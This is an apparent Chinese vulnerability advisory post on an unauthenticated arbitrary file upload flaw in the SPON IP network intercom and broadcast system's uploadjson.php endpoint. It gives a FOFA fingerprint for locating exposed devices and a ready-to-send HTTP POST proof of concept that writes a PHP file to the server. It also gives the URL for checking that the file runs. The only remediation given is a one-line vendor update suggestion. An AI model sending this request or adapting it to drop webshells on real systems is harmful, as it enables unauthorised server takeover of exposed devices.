世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

指纹识别

fofa:

python 复制代码
icon_hash="-1830859634"

漏洞利用

poc

python 复制代码
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
 
jsondata[filename]=2.php&jsondata[data]=<?php echo md5('123456');?>

验证url:

python 复制代码
http://your_ip/lan/2.php

修复建议

联系软件厂商更新至最新安全版本

相关推荐
easyboot1 小时前
openssl创建证书解决不安全问题
运维·服务器·安全
qq_430908571 小时前
网络安全迎来了新契机
安全·web安全
安全系统学习2 小时前
【网络安全】文件上传型XSS攻击解析
开发语言·python·算法·安全·web安全
谷雪_6582 小时前
学习华为 ensp 的学习心得体会
网络·学习·华为·网络工程·ensp
百分百题库APP2 小时前
从事登高架设作业需要注意哪些安全事项?
安全
zh4men93 小时前
Mac Parallels Desktop Kali 2025 代理设置
服务器·网络·macos·kali·pdesktop
夜空晚星灿烂5 小时前
C# 网络编程-关于HttpClient使用方式(三)
开发语言·网络·c#
mCell5 小时前
密码校验与攻击面:不再“裸奔”的防线
后端·安全·go
yczn1237 小时前
3D可视化数字孪生智能服务平台-物联网智控节能控、管、维一体化技术架构
大数据·网络·人工智能
alonetown7 小时前
IEC61850 通信协议测试验证方法详解
网络·iec61850·通信协议测试